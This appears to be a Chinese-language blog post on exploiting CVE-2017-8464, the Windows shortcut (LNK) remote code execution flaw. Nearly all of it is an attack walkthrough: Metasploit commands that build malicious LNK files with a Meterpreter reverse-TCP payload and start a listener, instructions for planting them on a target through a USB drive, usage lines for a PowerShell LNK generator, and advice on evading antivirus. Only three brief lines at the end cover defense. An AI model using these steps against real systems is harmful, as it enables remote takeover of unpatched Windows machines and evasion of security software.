1. 程式人生 > 其它 >“震網三代”(CVE-2017-8464)的幾種利用方法與防範

“震網三代”(CVE-2017-8464)的幾種利用方法與防範

早在6月13日,微軟釋出補丁修復編號為CVE-2017-8464的漏洞,本地使用者或遠端攻擊者可以利用該漏洞生成特製的快捷方式,並通過可移動裝置或者遠端共享的方式導致遠端程式碼執行,追溯到以前,NSA就承認利用過相似漏洞且以“Olympic Game”為代號研發震網病毒,來阻止伊朗發展核武。

CVE-2017-8464漏洞影響版本:

Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016

利用

1)在Metasploit-Framework中利用CVE-2017-8464

1.首先下載最新的zip包【點此下載】,下載完成後將壓縮包內modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb複製到目錄/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。

2.僅複製rb檔案會出錯,須再將壓縮包內data/exploits中的cve-2017-8464資料夾複製到/usr/share/metasploit-framework/data/exploits中。

3.開啟終端

msfconsole

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

exploit

之後/root/.msf4/local中就會生成我們想要的檔案了,生成這麼多和碟符有關,都留著也不佔地方。

4.繼續輸入命令

use multi/handler

set paylaod windows/meterpreter/reverse_tcp

set LHOST [你的IP地址]

run

5.將可移動磁碟插入靶機中,如果靶機開啟了自動播放,選擇瀏覽檔案時即可回彈。

演示:

*2)PowerShell

這個使用Powershell的方法並非先前網路上流傳的CVE-2017-8464復現方法。

首先下載Export-LNKPwn.ps1 <點選閱讀原文檢視該檔案>

注意:

-需要4.0或以上.NET庫版本,作者使用了一些只有PowerShell 5.0才有的建構函式(如new()),他打算將版本要求降低到.NET 3.5 和PowerShell 2.0,這樣的話模組在所有目標環境中都能被載入記憶體。 -作者想拓展函式,讓使用者可以生成原始的震網LNK exp(CVE-2010-2568),並解決繞過問題(CVE-2015-0096). -防毒軟體會處理你的LNK,多準備來躲避檢測!

引數說明:

LNKOutPath:本地儲存LNK檔案的全路徑。

TargetCPLPath:本地/遠端目標cpl的全路徑。

Type:所使用的FolderDataBlock型別,有“SpecialFolderDataBlock”和“KnownFolderDataBlock”兩種。

使用示例:

C:PS> Export-LNKPwn -LNKOutPath C:SomeLocalPath.lnk -TargetCPLPath C:TargetCPLPath.cpl -Type SpecialFolderDataBlock
C:PS> Export-LNKPwn -LNKOutPath C:SomeLocalPath.lnk -TargetCPLPath C:TargetCPLPath.cpl -Type KnownFolderDataBlock

演示視訊:

3)Python指令碼

使用較為方便,點選閱讀原文檢視。

C)防範

1.及時打上相應補丁

2.關閉USB自動播放

3.安裝防毒軟體